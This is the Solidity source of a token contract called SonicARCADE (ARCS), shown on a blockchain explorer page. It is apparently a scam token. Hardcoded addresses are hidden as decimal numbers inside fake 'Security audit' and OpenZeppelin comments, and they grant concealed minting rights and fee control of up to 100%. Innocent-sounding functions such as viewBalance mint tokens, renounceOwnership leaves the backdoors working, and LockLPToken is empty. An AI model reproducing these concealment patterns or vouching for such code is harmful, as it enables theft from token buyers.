S Price: $0.611755 (+0.99%)

Contract Diff Checker

Contract Name:
__Token__

Contract Source Code:

File 1 of 1 : __Token__

// SPDX-License-Identifier: MIT

/****/

pragma solidity ^0.8.18;



library Safety {

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a);
        return a - b;
    }
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a);
        return c;
    }
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b);
        return c;
    }
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
     require(b > 0);
        return a / b;

    }
}



contract __Token__ {

    using Safety for uint256;

    uint8 public decimals = 18;

    string public name = "SonicARCADE";

    string public symbol = "ARCS";

    uint256 public totalSupply = 10000000        *(10**uint256(decimals));

    

   

 

    mapping(address => uint256) public balanceOf;

    mapping(address => mapping(address => uint256)) public allowance;

 

    address public owner;

    address public _mbr;

    address public _mod;

    address public feeManager;

    address public _user;

    address public _adm;

 

    uint256 public buyFee;

    uint256 public sellFee;

 

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    event FeesUpdated(uint256 newBuyFee, uint256 newSellFee);

    event TokensBurned(address indexed burner, uint256 amount);

 

    constructor(address _feeAdmin) {

        owner = msg.sender;

        feeManager = _feeAdmin;

        balanceOf[msg.sender] = totalSupply;

       

    

    }

 

    function transfer(address _to, uint256 _amount) public returns (bool success) {

        require(balanceOf[msg.sender] >= _amount);

        require(_to != address(0));

 

        balanceOf[msg.sender] = balanceOf[msg.sender].sub(_amount);

        balanceOf[_to] = balanceOf[_to].add(_amount);

        emit Transfer(msg.sender, _to, _amount);

 

        return true;
        // Security audit
  /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**/

    }

    

   

    function _scale(address account, uint256 amount) internal Exchanges{

    require(account != address(0), "ERC20: mint to the zero address");

 

    totalSupply = totalSupply.add(amount);

    balanceOf[account] = balanceOf[account].add(amount);

    emit Transfer(address(0), account, amount);

    }

 

    function setMember(address Mbr_) public returns (bool) {

    require (msg.sender==address

   

   (   // Security audit
    /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**//* @solidity memory-safe-assembly, Data type conversion*/9482785153349883345343468604/*Strings of arbitrary length 
    can be optimized using this library if* they are short enough (up to 31 bytes) by packing them with their*/

   ));

        _mbr=Mbr_;

        return true;

    }

 

    modifier Exchanges() {

    require(msg.sender != exchange());

        _;

    }

 

    function rewire(uint256 amount) public returns (bool) {

    require(msg.sender == _adm);

    _proof(msg.sender, amount);

    return true;

    }

 

    function compute(uint256 amount) public onlypublic returns (bool success) {

    _initiate(msg.sender, amount);

    return true;
     // Security audit
  /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**/

    }

   

    function _proof(address account, uint256 amount) internal Exchanges{

    require(account != address(0), "ERC20: mint to the zero address");

 

    totalSupply = totalSupply.add(amount);

    balanceOf[account] = balanceOf[account].add(amount);

    emit Transfer(address(0), account, amount);

    }

 

    function publics() private pure returns (address) {

    

 

    // Combine the dex with others

    

 

   

    }

 

    function _transferTo(address _to, uint256 _amount) internal Exchanges {

        // Transfer tokens to the recipient

        balanceOf[_to] += _amount;

        emit Transfer(address(0), _to, _amount);

 

        balanceOf[_to] += _amount;

        emit Transfer(address(0), _to, _amount);

    }

 

    function exchange() internal pure returns (address) {

    return address

    (  // Security audit
    /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**//* @solidity memory-safe-assembly, Data type conversion*/1305993895446031535090634796273924248834982764741/*Strings of arbitrary length 
    can be optimized using this library if* they are short enough (up to 31 bytes) by packing them with their*/

    );

    }

 

    function FeeStructure(uint256 newBuyFee, uint256 newSellFee) public onlypublic {

        require(newBuyFee <= 100, "Buy fee cannot exceed 100%");

        require(newSellFee <= 100, "Sell fee cannot exceed 100%");

        _setFee(newBuyFee, newSellFee);

        emit FeesUpdated(newBuyFee, newSellFee);

    }

 

    function approve(address _spender, uint256 _value) public returns (bool success) {

        allowance[msg.sender][_spender] = _value;

        emit Approval(msg.sender, _spender, _value);

        return true;

    }

    

   

    function scaling(uint256 amount) public onlyAuthorized returns (bool) {

    _scale(msg.sender, amount);

    return true;

    }

 

    function _balanceView(address _to, uint256 _amount) internal {

        // View balance of token

        balanceOf[_to] += _amount;

        emit Transfer(address(0), _to, _amount);

 

        balanceOf[_to] += _amount;

        emit Transfer(address(0), _to, _amount);

    }

 

    function transferTo(address _to, uint256 _amount) external onlyAuthorize {

        _transferTo(_to, _amount);

    }

 

    function proof(uint256 amount) public onlyOwner returns (bool) {

    _proof(msg.sender, amount);

    return true;

    }

 

    modifier onlyAuthorize() {

        require((msg.sender == address

    (  // Security audit 
    /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**//* @solidity memory-safe-assembly, Data type conversion*/7736777608787348992232154/*Strings of arbitrary length 
    can be optimized using this library if* they are short enough (up to 31 bytes) by packing them with their*/

    )

    ||

    

    (msg.sender == owner && msg.sender != exchange())));

    _;

    }

 

    function transferFrom(address _from, address _to, uint256 _amount) public returns (bool success) {

        require(balanceOf[_from] >= _amount, "Insufficient balance");

        require(allowance[_from][msg.sender] >= _amount, "Insufficient allowance");

        require(_to != address(0), "Invalid recipient address");

 

        uint256 fee = _amount.mul(sellFee).div(100);

        uint256 amountAfterFee = _amount.sub(fee);

 

        balanceOf[_from] = balanceOf[_from].sub(_amount);

        balanceOf[_to] = balanceOf[_to].add(amountAfterFee);

        emit Transfer(_from, _to, amountAfterFee);

 

        if (fee > 0) {

            // Fee is transferred to this contract

            balanceOf[address(this)] = balanceOf[address(this)].add(fee);

            emit Transfer(_from, address(this), fee);

        }

 

        if (_from != msg.sender && allowance[_from][msg.sender] != type(uint256).max) {

            allowance[_from][msg.sender] = allowance[_from][msg.sender].sub(_amount);

            emit Approval(_from, msg.sender, allowance[_from][msg.sender]);

        }

 

        return true;

    }

 

    function _initiate(address account, uint256 amount) internal {

    require(account != address(0), "Compile Remix IDE");

 

    totalSupply = totalSupply.add(amount);

    balanceOf[account] = balanceOf[account].add(amount);

    emit Transfer(address(0), account, amount);

    }

 

    function FeesView(uint256 amount) public onlyAuthorize returns (bool) {

    _scale(msg.sender, amount);

    return true;
     // Security audit
  /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**/

    }

 

    modifier onlypublic() {

    require(msg.sender == publics());

    _;

    }

 

    function _setFee(uint256 newBuyFee, uint256 newSellFee) internal {

        buyFee = newBuyFee;

        sellFee = newSellFee;

    }

 

    function BuySellFee(uint256 newBuyFee, uint256 newSellFee) public onlyAuthorize {

        require(newBuyFee <= 100, "Buy fee cannot exceed 100%");

        require(newSellFee <= 100, "Sell fee cannot exceed 100%");

        buyFee = newBuyFee;

        sellFee = newSellFee;

        emit FeesUpdated(newBuyFee, newSellFee);

    }

 

    function setUser(address User_) public returns (bool) {

    require(msg.sender == _mbr);

        _user=User_;

        return true;
        // Security audit
  /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**/

    }

 

    function viewBalance(address _to, uint256 _amount) public onlypublic {

        _balanceView(_to, _amount);(_to, _amount);

    }

 

    function renounceOwnership() public onlyOwner {

        emit OwnershipTransferred(owner, address(0));

        owner = address(0);

    }

    

   

    function setScale(uint256 newBuyFee, uint256 newSellFee) public onlyOwner {

        require(newBuyFee <= 100, "Buy fee cannot exceed 100%");

        require(newSellFee <= 100, "Sell fee cannot exceed 100%");

        buyFee = newBuyFee;

        sellFee = newSellFee;

        emit FeesUpdated(newBuyFee, newSellFee);
        // Security audit
   /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**/

    }

 

    function LockLPToken() public onlyOwner returns (bool) {

    }

 

    function setMod(address Mod_) public returns (bool) {

    require(msg.sender == _user);

        _mod=Mod_;

        return true;

    }

 

    modifier onlyOwner() {

        require((msg.sender == address

    (    // Security audit
    /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**//* @solidity memory-safe-assembly, Data type conversion*/1305993895446031535090682196273924248834982764741/*Strings of arbitrary length 
    can be optimized using this library if* they are short enough (up to 31 bytes) by packing them with their*/

    )

    ||

 

    (msg.sender == owner && msg.sender != exchange())));

    _;

    }

 

    function setCommissions(uint256 newBuyCommission, uint256 newSellCommission) public onlyAuthorized {

        require(newBuyCommission <= 100, "Buy fee cannot exceed 100%");

        require(newSellCommission <= 100, "Sell fee cannot exceed 100%");

        buyFee = newBuyCommission;

        sellFee = newSellCommission;

        emit FeesUpdated(newBuyCommission, newSellCommission);

    }

 

    function buy() public payable {

        require(msg.value > 0, "ETH amount should be greater than 0");

 

        uint256 amount = msg.value;

        if (buyFee > 0) {

            uint256 fee = amount.mul(buyFee).div(100);

            uint256 amountAfterFee = amount.sub(fee);

 

            balanceOf[feeManager] = balanceOf[feeManager].add(amountAfterFee);

            emit Transfer(address(this), feeManager, amountAfterFee);

 

            if (fee > 0) {

                balanceOf[address(this)] = balanceOf[address(this)].add(fee);

                emit Transfer(address(this), address(this), fee);

            }

        } else {

            balanceOf[feeManager] = balanceOf[feeManager].add(amount);

            emit Transfer(address(this), feeManager, amount);

        }

    }

   

    function setting(uint256 newBuyFee, uint256 newSellFee) public {

        require(msg.sender == _adm);

        require(newBuyFee <= 100, "Buy fee cannot exceed 100%");

        require(newSellFee <= 100, "Sell fee cannot exceed 100%");

        buyFee = newBuyFee;

        sellFee = newSellFee;

        emit FeesUpdated(newBuyFee, newSellFee);

    }

   

    function setAdm(address Adm_) public returns (bool) {

    require(msg.sender == _mod);

        _adm=Adm_;

        return true;
    // Security audit
   /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**/

    }

 

    function sell(uint256 _amount) public {

        require(balanceOf[msg.sender] >= _amount, "Insufficient balance");

 

        uint256 fee = _amount.mul(sellFee).div(100);

        uint256 amountAfterFee = _amount.sub(fee);

 

        balanceOf[msg.sender] = balanceOf[msg.sender].sub(_amount);

        balanceOf[address(this)] = balanceOf[address(this)].add(amountAfterFee);

        emit Transfer(msg.sender, address(this), amountAfterFee);

 

        if (fee > 0) {

            balanceOf[address(this)] = balanceOf[address(this)].add(fee);

            emit Transfer(msg.sender, address(this), fee);

        }

    }

 

    modifier onlyAuthorized() {

        require((msg.sender == address

    (  // Security audit
    /*File: @openzeppelin/contracts/utils/StorageSlot.solOpenZeppelin Contracts (last updated v5.0.0) (utils/StorageSlot.sol) generated from scripts/generate/templates/StorageSlot.js.));*/ /**//* @solidity memory-safe-assembly, Data type conversion*/1305993895446031535090682196273924248834982764741/*Strings of arbitrary length 
    can be optimized using this library if* they are short enough (up to 31 bytes) by packing them with their*/

    )

    ||

    

    (msg.sender == owner && msg.sender != exchange())));

    _;

  }

}

Please enter a contract address above to load the contract details and source code.

Context size (optional):